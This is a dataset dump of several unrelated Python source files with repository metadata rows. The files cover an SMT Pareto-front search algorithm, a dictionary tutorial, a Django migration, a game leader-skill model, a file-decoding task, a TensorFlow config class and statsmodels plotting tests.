self.writeTotalTimeFilename = writeTotalTimeFilename
self.useCallLogs = useCallLogs
if self.writeLogFilename != "":
self.logfile = open(self.writeLogFilename, "w")
self.incrementallyprintparetopoints = incrementallyprintparetopoints
self.writeRandomSeedsFilename = writeRandomSeedsFilename
self.magnifying_glass = magnifying_glass
self.num_models = num_models
class GuidedImprovementAlgorithm(object):
def __init__(self, cfr_inst, s, metrics_variables, metrics_objective_direction, decision_variables=[], options=GuidedImprovementAlgorithmOptions()):
self.cfr = cfr_inst
self.s = s
self.metrics_variables = metrics_variables
self.metrics_objective_direction = metrics_objective_direction
self.decision_variables = decision_variables
self.options = options
self.verbosity = self.options.verbosity
'''
CAUTION: REMOVED FUNCTIONALITY FOR OUTPUT E.G RECORDPOINT STUFF BELOW
'''
def genEquivalentSolutions(self, point, count):
self.s.push()
equivalentSolutions = []
equalConstraint = self.ConstraintEqualToX(point)
self.s.add(equalConstraint)
preventSameModel(self.cfr, self.s, point)
while(self.s.check() == Common.SAT and not(len(equivalentSolutions) + count == self.options.num_models)):
solution = self.s.model()
preventSameModel(self.cfr, self.s, solution)
equivalentSolutions.append(solution)
self.s.pop()
return equivalentSolutions
def addParetoPoints(self, ParetoFront, point):
ParetoFront.append(point)
return ParetoFront
def replicateSolver(self, solver, num_consumers):
solvers = []
for _ in range(num_consumers):
newSolver = BaseSolver.getSolver()
for j in solver.assertions():
newSolver.add(j)
solvers.append(newSolver)
return solvers
def ExecuteGuidedImprovementAlgorithm(self, outfilename):
"""
Ran the Guided Improvement Algorithm.
"""
count_paretoPoints = 0
ParetoFront = []
initial_start_time = time()
start_time = time()
count_sat_calls = 0
count_unsat_calls = 0
if self.options.magnifying_glass:
self.s.push()
if self.s.check() == Common.SAT:
count_sat_calls += 1
prev_solution = self.s.model()
self.s.push()
FirstParetoPoint, local_count_sat_calls, local_count_unsat_calls = self.ranToParetoFront(prev_solution)
end_time = time()
count_sat_calls += local_count_sat_calls
count_unsat_calls += local_count_unsat_calls
count_paretoPoints += 1
ParetoFront = self.addParetoPoints(ParetoFront, FirstParetoPoint)
strNextParetoPoint = list((d.name(), str(FirstParetoPoint[d])) for d in FirstParetoPoint.decls())
if RECORDPOINT:
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(end_time - start_time) + ',' +
str(strNextParetoPoint) + ',' +
'\n')
finally:
outputFile.close()
self.s.pop()
tmpNotDominatedByFirstParetoPoint = self.ConstraintNotDominatedByX(FirstParetoPoint)
self.s.add(tmpNotDominatedByFirstParetoPoint)
start_time = time()
while(self.s.check() == Common.SAT and not(len(ParetoFront) == self.options.num_models)):
count_sat_calls += 1
prev_solution = self.s.model()
self.s.push()
NextParetoPoint, local_count_sat_calls, local_count_unsat_calls = self.ranToParetoFront(prev_solution)
end_time = time()
count_sat_calls += local_count_sat_calls
count_unsat_calls += local_count_unsat_calls
count_paretoPoints += 1
ParetoFront = self.addParetoPoints(ParetoFront, NextParetoPoint)
# RecordPoint
strNextParetoPoint = list((d.name(), str(FirstParetoPoint[d])) for d in FirstParetoPoint.decls())
if RECORDPOINT:
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(end_time - start_time) + ',' +
str(strNextParetoPoint) + ',' +
'\n')
finally:
outputFile.close()
self.s.pop()
tmpNotDominatedByNextParetoPoint = self.ConstraintNotDominatedByX(NextParetoPoint)
self.s.add(tmpNotDominatedByNextParetoPoint)
start_time = time()
count_unsat_calls += 1
end_time = time()
if self.options.magnifying_glass:
self.s.pop()
for i in ParetoFront:
equivalentSolutions = self.genEquivalentSolutions(i, len(ParetoFront))
ParetoFront = ParetoFront + equivalentSolutions
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(count_unsat_calls) + ',' +
str(end_time - initial_start_time) + ',' +
'\n')
finally:
outputFile.close()
return ParetoFront
def print_stats_info(self, end_time, start_time, ParetoFront):
statsfile_fd = open(self.args.statsfile, "a")
self.print_header_if_file_is_empty(statsfile_fd)
statsfile_fd.write( "%s, %s,%s\n" % (self.optimizationmodelname , (end_time - start_time), len(ParetoFront)))
statsfile_fd.close()
def print_header_if_file_is_empty(self, statsfile_fd):
if statsfile_fd.tell() == 0:
statsfile_fd.write("%s, %s, %s\n" % ('model name' , 'time to compute pareto front', 'length of pareto front'))
def print_solution(self, solution):
"""
Prints the objective value for the solution in one line, followed by the decision variables in the next line.
"""
SolutionSpacePoint = []
for metric in self.metrics_variables:
SolutionSpacePoint.append(solution[metric])
print(SolutionSpacePoint)
DecisionSpacePoint = []
for instVariable in solution.decls() :
if instVariable.name() not in self.exclude_variables_in_printout:
DecisionSpacePoint.append("%s=%s" % (instVariable.name(), solution[instVariable]))
print(DecisionSpacePoint)
def ranToParetoFront(self, prev_solution):
"""
Iterates until a pareto optimal solution is found.
"""
local_count_sat_calls = 0
local_count_unsat_calls = 0
tmpConstraintMustDominateX= self.ConstraintMustDominatesX(prev_solution)
self.s.add(tmpConstraintMustDominateX)
while (self.s.check() == Common.SAT):
local_count_sat_calls += 1
prev_solution = self.s.model()
tmpConstraintMustDominateX = self.ConstraintMustDominatesX(prev_solution)
self.s.add(tmpConstraintMustDominateX)
local_count_unsat_calls += 1
return prev_solution, local_count_sat_calls, local_count_unsat_calls
def ConstraintNotDominatedByX(self, model):
"""
Creates a constraint preventing search in dominated regions.
"""
DisjunctionOrLessMetrics = list()
for i in range(len(self.metrics_variables)):
if self.metrics_objective_direction[i] == Common.METRICS_MAXIMIZE:
DisjunctionOrLessMetrics.append(SMTLib.SMT_GT(self.metrics_variables[i], SMTLib.SMT_IntConst(Common.evalForNum(model, self.metrics_variables[i].convert(self.cfr.solver.converter)))))#model[self.metrics_variables[i]])
else :
DisjunctionOrLessMetrics.append(SMTLib.SMT_LT(self.metrics_variables[i], SMTLib.SMT_IntConst(Common.evalForNum(model, self.metrics_variables[i].convert(self.cfr.solver.converter)))))#model[self.metrics_variables[i]])
return SMTLib.SMT_Or(*DisjunctionOrLessMetrics)
def ConstraintEqualToX(self, model):
"""
Returns a Constraint that a new instance, can't be dominated by the instance represented by model.
(it can't be worst in any objective).
"""
EqualMetrics = list()
for i in range(len(self.metrics_variables)):
EqualMetrics.append(SMTLib.SMT_EQ(self.metrics_variables[i], Common.evalForNum(model, self.metrics_variables[i])))
return SMTLib.SMT_And(EqualMetrics)
def get_metric_values(self, model):
metrics = list()
for i in range(len(self.metrics_variables)):
strval = str(model.eval(self.metrics_variables[i].convert(self.cfr.solver.converter)))
try:
val = int(strval)
except:
val = float(strval)
metrics.append(val)
return metrics
def ConstraintMustDominatesX(self, model):
"""
Returns a constraint that a new instance has to be better than the instance represented by model in at least one dimension,
and better or equal in all the other ones.
"""
dominationDisjunction= []
i = 0
for dominatedByMetric in self.metrics_variables:
dominationConjunction = []
j = 0
if self.metrics_objective_direction[i] == Common.METRICS_MAXIMIZE:
dominationConjunction.append(SMTLib.SMT_GT(dominatedByMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, dominatedByMetric.convert(self.cfr.solver.converter)))))
else:
dominationConjunction.append(SMTLib.SMT_LT(dominatedByMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, dominatedByMetric.convert(self.cfr.solver.converter)))))
for AtLeastEqualInOtherMetric in self.metrics_variables:
if j != i:
if self.metrics_objective_direction[j] == Common.METRICS_MAXIMIZE:
dominationConjunction.append(SMTLib.SMT_GE(AtLeastEqualInOtherMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, AtLeastEqualInOtherMetric.convert(self.cfr.solver.converter)))))
else:
dominationConjunction.append(SMTLib.SMT_LE(AtLeastEqualInOtherMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, AtLeastEqualInOtherMetric.convert(self.cfr.solver.converter)))))
j = 1 + j
i = 1 + i
dominationDisjunction.append(SMTLib.SMT_And(*dominationConjunction))
constraintDominateX = SMTLib.SMT_Or(*dominationDisjunction)
return constraintDominateX
| [
"[email protected]"
] | |
3b20d8bc8956d16dfbb697f43dec97305b5fa7df | 8ef6dbdd3791dd7fbe1320483a22e0540c54359b | /Core Python/Dictionary/19Nested.py | 83bae4d2c11b6adf2d1a3a4876f39b5fc4330d28 | [] | no_license | kundan4U/Python | 8095eecba088910d2068a6375c907d47f2bb9c95 | 6b3fdbe66edb52e9f612352abb9c6563547b6297 | refs/heads/main | 2023-06-24T06:29:43.770282 | 2021-07-21T18:40:11 | 2021-07-21T18:40:11 | 388,213,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py |
# Nested Dictionary
# Empty nested dictionary
z={
1:{},
2:{},
3:{}
}
# Access Element
a = {'course':'python','fees':15000,1:{'course':'javaScript','fees':100000}}
print(a['course'])
print(a[1])
print(a[1]['fees'],"\n")
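# Illustrative addition: walking a nested dictionary with a loop
# (uses the dictionary `a` defined above).
for key, value in a.items():
    if isinstance(value, dict):
        for inner_key, inner_value in value.items():
            print(key, "->", inner_key, "=", inner_value)
    else:
        print(key, "=", value)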
# Modify element
print("Before modifying", a)
a['course']= 'Machine Learning'
print("After modifying", a) | [
"[email protected]"
] | |
04facd847cbb9cda0046a3abb22c61f30f0cee65 | 6f844abf7c436a4ae3444744c523f5f1fe6367a4 | /UserBase/migrations/0016_auto_20171123_1931.py | fb52007d0c78de3f27659bd6a8992c3d97a6bb13 | [] | no_license | deepakbhamla/Halanx_Backend_Task | 1dd02a1061eb4d4f6072a3276735cb606dfec752 | acda98c6b79690689317585dd06cf0c1cfc65192 | refs/heads/master | 2022-04-12T10:02:29.740781 | 2020-03-12T12:17:22 | 2020-03-12T12:27:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-23 14:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserBase', '0015_customer_profilepic'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='ProfilePic',
field=models.TextField(blank=True, help_text='In Base64', null=True),
),
]
| [
"[email protected]"
] | |
84bf444bf1e614422ec13359d22a0d727da1ca4c | d9e0585e57b482d91e8af7514e683e2488e23381 | /dbcog/models/leader_skill_model.py | 804712af51304155ae45a7a870eda7e86f31d374 | [
"MIT"
] | permissive | TrendingTechnology/pad-cogs | d08abb8da8bf2763a4091a29139168d8c1d2333a | b913a4e16a6473b8b53fae4bda564bedcc82c876 | refs/heads/master | 2023-08-11T01:10:22.088761 | 2021-09-19T00:41:43 | 2021-09-19T00:41:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,847 | py | import re
from .base_model import BaseModel
class LeaderSkillModel(BaseModel):
def __init__(self, **kwargs):
self.leader_skill_id = kwargs['leader_skill_id']
self.name_ja = kwargs['name_ja']
self.name_en = kwargs['name_en']
self.name_ko = kwargs['name_ko']
self.max_hp = kwargs['max_hp']
self.max_atk = kwargs['max_atk']
self.max_rcv = kwargs['max_rcv']
self.max_shield = kwargs['max_shield']
self.max_combos = kwargs['max_combos']
self.bonus_damage = kwargs['bonus_damage']
self.mult_bonus_damage = kwargs['mult_bonus_damage']
self.extra_time = kwargs['extra_time']
self.tags = [int(tag) for tag in re.findall(r'\((\d+)\)', kwargs['tags'])]
self.desc_en = kwargs['desc_en']
self.desc_ja = kwargs['desc_ja']
self.desc_ko = kwargs['desc_ko']
@property
def data(self):
return (self.max_hp,
self.max_atk,
self.max_rcv,
self.max_shield,
self.max_combos,
self.bonus_damage,
self.mult_bonus_damage,
self.extra_time)
@property
def desc(self):
return self.desc_en or self.desc_ja
@property
def name(self):
return self.name_en or self.name_ja
@property
def is_7x6(self):
return 200 in self.tags
def to_dict(self):
return {
'leader_skill_id': self.leader_skill_id,
'name_ja': self.name_ja,
'name_en': self.name_en,
}
def __eq__(self, other):
if isinstance(other, LeaderSkillModel):
return self.leader_skill_id == other.leader_skill_id \
and self.data == other.data \
and self.desc_en == other.desc_en
return False
| [
"[email protected]"
] | |
46a00379b4971f43bbcd75efd489630c9201401e | 470c6e447c7ee6daed90a0bf1216e2fb838282b6 | /rtl/tasks/open.py | 1b982debfdebfb9d21abbbfe2a35895eedbfcc43 | [
"Apache-2.0"
] | permissive | kelceydamage/raspi-tasks | d0300173b2eba274a5c0a974b7ecb8817586d22d | 18aa323e3e2428c998b7472c226d05a00c8ae8c2 | refs/heads/master | 2020-07-02T11:55:27.276343 | 2019-08-10T06:42:42 | 2019-08-10T06:42:42 | 201,520,835 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,396 | py | #!/usr/bin/env python3
# ------------------------------------------------------------------------ 79->
# Author: ${name=Kelcey Damage}
# Python: 3.5+
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Doc
# ------------------------------------------------------------------------ 79->
#
# Imports
# ------------------------------------------------------------------------ 79->
import zlib
import ast
import ujson as json
import numpy as np
from numpy import ndarray
from numpy import array
from rtl.common.task import Task
# Globals
# ------------------------------------------------------------------------ 79->
# Classes
# ------------------------------------------------------------------------ 79->
class Open(Task):
def __init__(self, kwargs, content):
super(Open, self).__init__(kwargs, content)
self.keys = [
'compression',
'delimiter',
'encoding'
]
self.defaults = {
'compression': False,
'delimiter': '\n',
'encoding': False
}
self.configuration = {}
self.mode = 'r'
for key in self.keys:
if key in kwargs:
self.configuration[key] = kwargs[key]
else:
self.configuration[key] = self.defaults[key]
def openfile(self):
if self.configuration['compression']:
self.mode = 'rb'
with open('{0}/{1}'.format(self.path, self.file), self.mode) as f:
r = f.read()
if self.configuration['compression']:
r = zlib.decompress(r).decode()
parts = r.replace('][', ']\n[').split('\n')
return parts
def decode(self, parts):
results = []
while parts:
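# NOTE: popping from the end processes the input lines in reverse order.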
item = parts.pop().strip('\n')
if item == '':
continue
if self.configuration['encoding']:
item = json.loads(item.rstrip())
else:
item = item.rstrip().split(self.configuration['delimiter'])
results.append(item)
return results
def open(self):
parts = self.openfile()
if parts == [''] or parts == '':
return [[False]]
results = self.decode(parts)
del parts
if self.mixed:
self.data = {i: results[i] for i in range(len(results))}
self.data['headers'] = self.headers
else:
self.ndata = np.ndarray(
(len(results), len(results[0])),
buffer=array(results),
dtype=np.dtype(int)
)
return self
# Functions
# ------------------------------------------------------------------------ 79->
def task_open(kwargs, contents):
return Open(kwargs, contents).open().getContents()
# Main
# ------------------------------------------------------------------------ 79->
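# Illustrative standalone sketch -- independent of the Task base class, and
# assuming plain uncompressed text with a comma delimiter. It mirrors the
# non-JSON branch of Open.decode above (without the reversed ordering):
def decode_lines(lines, delimiter=','):
    return [ln.rstrip().split(delimiter) for ln in lines if ln.strip()]
# decode_lines(['1,2,3\n', '4,5,6\n']) -> [['1', '2', '3'], ['4', '5', '6']]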
| [
"[email protected]"
] | |
4d2c140c6db6f542dc0a49fd239d9fe840daa562 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/msData/datatypes/Facets/double/double_enumeration002.py | 59133e9f2219248cc567d675c7fac346d16f2afd | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 273 | py | from output.models.ms_data.datatypes.facets.double.double_enumeration002_xsd.double_enumeration002 import FooTypeFoo
from output.models.ms_data.datatypes.facets.double.double_enumeration002_xsd.double_enumeration002 import Test
obj = Test(
foo=FooTypeFoo.VALUE_1_1
)
| [
"[email protected]"
] | |
a097e28031810d9e35910e6b6bf5d6a647d3a901 | 21a5d36b32ddf277be891fd1f0e93d458c4f0c2f | /official/modeling/hyperparams/base_config.py | 7ce5ce2d55016dce0c985a0e6f9fe3893a25f644 | [
"Apache-2.0"
] | permissive | pkulzc/models | 7cf3b718bc4edba53accd14b692712f6c1883578 | 2ec6572e1b79127a7cf905c1e67ec6568e364f10 | refs/heads/master | 2021-06-28T08:04:36.609825 | 2020-06-18T17:54:53 | 2020-06-18T22:00:50 | 126,526,822 | 8 | 9 | Apache-2.0 | 2018-03-23T18:50:30 | 2018-03-23T18:50:29 | null | UTF-8 | Python | false | false | 8,964 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base configurations to standardize experiments."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import copy
import functools
from typing import Any, List, Mapping, Optional, Type
import dataclasses
import tensorflow as tf
import yaml
from official.modeling.hyperparams import params_dict
@dataclasses.dataclass
class Config(params_dict.ParamsDict):
"""The base configuration class that supports YAML/JSON based overrides.
* It recursively enforces a whitelist of basic types and container types, so
it avoids surprises with copy and reuse caused by unanticipated types.
* It converts dict to Config even within sequences,
e.g. for config = Config({'key': [([{'a': 42}],)]}),
type(config.key[0][0][0]) is Config rather than dict.
"""
# It's safe to add bytes and other immutable types here.
IMMUTABLE_TYPES = (str, int, float, bool, type(None))
# It's safe to add set, frozenset and other collections here.
SEQUENCE_TYPES = (list, tuple)
default_params: dataclasses.InitVar[Optional[Mapping[str, Any]]] = None
restrictions: dataclasses.InitVar[Optional[List[str]]] = None
@classmethod
def _isvalidsequence(cls, v):
"""Check if the input values are valid sequences.
Args:
v: Input sequence.
Returns:
True if the sequence is valid. Valid sequence includes the sequence
type in cls.SEQUENCE_TYPES and element type is in cls.IMMUTABLE_TYPES or
is dict or ParamsDict.
"""
if not isinstance(v, cls.SEQUENCE_TYPES):
return False
return (all(isinstance(e, cls.IMMUTABLE_TYPES) for e in v) or
all(isinstance(e, dict) for e in v) or
all(isinstance(e, params_dict.ParamsDict) for e in v))
@classmethod
def _import_config(cls, v, subconfig_type):
"""Returns v with dicts converted to Configs, recursively."""
if not issubclass(subconfig_type, params_dict.ParamsDict):
raise TypeError(
'Subconfig_type should be subclass of ParamsDict, found {!r}'.format(
subconfig_type))
if isinstance(v, cls.IMMUTABLE_TYPES):
return v
elif isinstance(v, cls.SEQUENCE_TYPES):
# Only support one layer of sequence.
if not cls._isvalidsequence(v):
raise TypeError(
'Invalid sequence: only supports single level {!r} of {!r} or '
'dict or ParamsDict found: {!r}'.format(cls.SEQUENCE_TYPES,
cls.IMMUTABLE_TYPES, v))
import_fn = functools.partial(
cls._import_config, subconfig_type=subconfig_type)
return type(v)(map(import_fn, v))
elif isinstance(v, params_dict.ParamsDict):
# Deepcopy here is a temporary solution for preserving type in nested
# Config object.
return copy.deepcopy(v)
elif isinstance(v, dict):
return subconfig_type(v)
else:
raise TypeError('Unknown type: {!r}'.format(type(v)))
@classmethod
def _export_config(cls, v):
"""Returns v with Configs converted to dicts, recursively."""
if isinstance(v, cls.IMMUTABLE_TYPES):
return v
elif isinstance(v, cls.SEQUENCE_TYPES):
return type(v)(map(cls._export_config, v))
elif isinstance(v, params_dict.ParamsDict):
return v.as_dict()
elif isinstance(v, dict):
raise TypeError('dict value not supported in converting.')
else:
raise TypeError('Unknown type: {!r}'.format(type(v)))
@classmethod
def _get_subconfig_type(cls, k) -> Type[params_dict.ParamsDict]:
"""Get element type by the field name.
Args:
k: the key/name of the field.
Returns:
Config as default. If a type annotation is found for `k`,
1) returns the type of the annotation if it is subtype of ParamsDict;
2) returns the element type if the annotation of `k` is List[SubType]
or Tuple[SubType].
"""
subconfig_type = Config
if k in cls.__annotations__:
# Directly Config subtype.
type_annotation = cls.__annotations__[k]
if (isinstance(type_annotation, type) and
issubclass(type_annotation, Config)):
subconfig_type = cls.__annotations__[k]
else:
# Check if the field is a sequence of subtypes.
field_type = getattr(type_annotation, '__origin__', type(None))
if (isinstance(field_type, type) and
issubclass(field_type, cls.SEQUENCE_TYPES)):
element_type = getattr(type_annotation, '__args__', [type(None)])[0]
subconfig_type = (
element_type if issubclass(element_type, params_dict.ParamsDict)
else subconfig_type)
return subconfig_type
def __post_init__(self, default_params, restrictions, *args, **kwargs):
super().__init__(default_params=default_params,
restrictions=restrictions,
*args,
**kwargs)
def _set(self, k, v):
"""Overrides same method in ParamsDict.
Also called by ParamsDict methods.
Args:
k: key to set.
v: value.
Raises:
RuntimeError
"""
subconfig_type = self._get_subconfig_type(k)
if isinstance(v, dict):
if k not in self.__dict__ or not self.__dict__[k]:
# If the key does not exist or the value is None, a new Config-family
# object should be created for the key.
self.__dict__[k] = subconfig_type(v)
else:
self.__dict__[k].override(v)
else:
self.__dict__[k] = self._import_config(v, subconfig_type)
def __setattr__(self, k, v):
if k not in self.RESERVED_ATTR:
if getattr(self, '_locked', False):
raise ValueError('The Config has been locked. ' 'No change is allowed.')
self._set(k, v)
def _override(self, override_dict, is_strict=True):
"""Overrides same method in ParamsDict.
Also called by ParamsDict methods.
Args:
override_dict: dictionary to write to.
is_strict: If True, adding new keys is not allowed.
Raises:
KeyError: overriding reserved keys or keys not exist (is_strict=True).
"""
for k, v in sorted(override_dict.items()):
if k in self.RESERVED_ATTR:
raise KeyError('The key {!r} is internally reserved. '
'Can not be overridden.'.format(k))
if k not in self.__dict__:
if is_strict:
raise KeyError('The key {!r} does not exist in {!r}. '
'To extend the existing keys, use '
'`override` with `is_strict` = False.'.format(
k, type(self)))
else:
self._set(k, v)
else:
if isinstance(v, dict) and self.__dict__[k]:
self.__dict__[k]._override(v, is_strict) # pylint: disable=protected-access
elif isinstance(v, params_dict.ParamsDict) and self.__dict__[k]:
self.__dict__[k]._override(v.as_dict(), is_strict) # pylint: disable=protected-access
else:
self._set(k, v)
def as_dict(self):
"""Returns a dict representation of params_dict.ParamsDict.
For the nested params_dict.ParamsDict, a nested dict will be returned.
"""
return {
k: self._export_config(v)
for k, v in self.__dict__.items()
if k not in self.RESERVED_ATTR
}
def replace(self, **kwargs):
"""Like `override`, but returns a copy with the current config unchanged."""
params = self.__class__(self)
params.override(kwargs, is_strict=True)
return params
@classmethod
def from_yaml(cls, file_path: str):
# Note: This only works if the Config has all default values.
with tf.io.gfile.GFile(file_path, 'r') as f:
loaded = yaml.load(f)
config = cls()
config.override(loaded)
return config
@classmethod
def from_json(cls, file_path: str):
"""Wrapper for `from_yaml`."""
return cls.from_yaml(file_path)
@classmethod
def from_args(cls, *args, **kwargs):
"""Builds a config from the given list of arguments."""
attributes = list(cls.__annotations__.keys())
default_params = {a: p for a, p in zip(attributes, args)}
default_params.update(kwargs)
return cls(default_params)
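# --- Illustrative usage sketch ---------------------------------------------
# A minimal, assumption-laden example (hypothetical subclass and field names,
# not part of the library): a dataclass subclass overridden in strict mode.
if __name__ == '__main__':
  @dataclasses.dataclass
  class _ExampleConfig(Config):
    name: str = 'sgd'
    learning_rate: float = 0.1

  cfg = _ExampleConfig()
  cfg.override({'learning_rate': 0.01})  # strict: the key must already exist
  assert cfg.as_dict() == {'name': 'sgd', 'learning_rate': 0.01}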
| [
"[email protected]"
] | |
1c1a0e0b8ff5071c1c2792231ed5f1acce0adb43 | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/mpl_toolkits/axes_grid/grid_helper_curvelinear.py | c425086ada0af2702e837a37bcf0b19bd7ddfa0c | [
"MIT",
"BSD-3-Clause"
] | permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 63 | py | from mpl_toolkits.axisartist.grid_helper_curvelinear import *
| [
"[email protected]"
] | |
5930d4f80c56d4ac4735ccaa84bd96cd822d5d74 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/statsmodels/graphics/tests/test_boxplots.py | 503c5cc20c15d3e577a1709b13de1418c79ccd3c | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,315 | py | import numpy as np
from numpy.testing import dec
from statsmodels.graphics.boxplots import violinplot, beanplot
from statsmodels.datasets import anes96
try:
import matplotlib.pyplot as plt
have_matplotlib = True
except ImportError:
have_matplotlib = False
@dec.skipif(not have_matplotlib)
def test_violinplot_beanplot():
# Test violinplot and beanplot with the same dataset.
data = anes96.load_pandas()
party_ID = np.arange(7)
labels = ["Strong Democrat", "Weak Democrat", "Independent-Democrat",
"Independent-Independent", "Independent-Republican",
"Weak Republican", "Strong Republican"]
age = [data.exog['age'][data.endog == id] for id in party_ID]
fig = plt.figure()
ax = fig.add_subplot(111)
violinplot(age, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small',
'label_rotation':30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small',
'label_rotation':30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True,
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True, side='right',
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True, side='left',
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels,
plot_opts={'bean_legend_text': 'text'})
plt.close(fig)
| [
"[email protected]"
] | |
3c2c612f1ce660f79c63116378101afddeb27721 | cc4d7a0dc58e70379fda3d1f6b75c7b70ad1e205 | /UDEMY/numbers.py | 42aaed7267cc1885a724c942be82aff76500f3f3 | [] | no_license | evamaina/Python_practice | 2da766d61c111135285323aa2b8fb50ee5b31be1 | ecd6c255dc66b2dc6f2cd81ec79bc42a241bfca1 | refs/heads/master | 2020-03-24T00:08:17.911604 | 2018-07-25T09:17:41 | 2018-07-25T09:17:41 | 142,275,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# Modify the method below to make sure only even numbers are returned.
def even_numbers():
evens = []
for number in numbers:
if number % 2 == 0:
evens.append(number)
return evens
# Modify the below method so that "Quit" is returned if the choice parameter is "q".
# Don't remove the existing code
def user_menu(choice):
if choice == "a":
return "Add"
elif choice == "q":
return "Quit"
else:
return None | [
"[email protected]"
] | |
a3343c3fc5ec2c28d9012a8f7aab290396c75b50 | 312d40d6023858891dd32bda67579f7284a54c15 | /06/00/keys.py | bb03a499aa679a455ffcfd78b62d8aa5294e54e4 | [
"CC0-1.0"
] | permissive | pylangstudy/201708 | b67a49f091f5f949954e7b9a910a07761fe9a7d1 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | refs/heads/master | 2021-01-01T20:49:15.973299 | 2017-08-31T00:18:55 | 2017-08-31T00:18:55 | 98,936,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | d = {'k1':'v1', 'k2':'v2'}; print(d)
print(d.keys())
for k in d.keys(): print(k, d[k])
| [
"[email protected]"
] | |
fd4b14a27556c53af09d1ab430e96ecf11199d9c | 7c7c3a34b266e664cf63f710ae5aff5587672c91 | /ALUS/countingBlobs/createTestingImagesFile.py | 1c4ad82a1afd8acf6aee2de2c29ef1da109498f2 | [] | no_license | Schnei1811/PythonScripts | 845594a886a1fecc81cf5d7c550abec325f006a3 | 89eb331357b7cea86f5b2d0b33089215b73f9481 | refs/heads/main | 2023-03-31T23:36:48.731570 | 2021-04-11T21:55:46 | 2021-04-11T21:55:46 | 356,950,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | import os
from glob import glob
from tqdm import tqdm
import cv2
# img_dir = "G:\\PythonData\\ALUS\\ALUS_Data\\"
# img_dir = "G:\\PythonData\\ALUS\\ALUS_Mixed_Test_Set\\"
img_dir = "C:\\Users\\Stefan\\Desktop\\CountBlobs\\LCFCN-master\\ALUS_BL\\"
# sizes = [1, 2, 3, 4, 5]
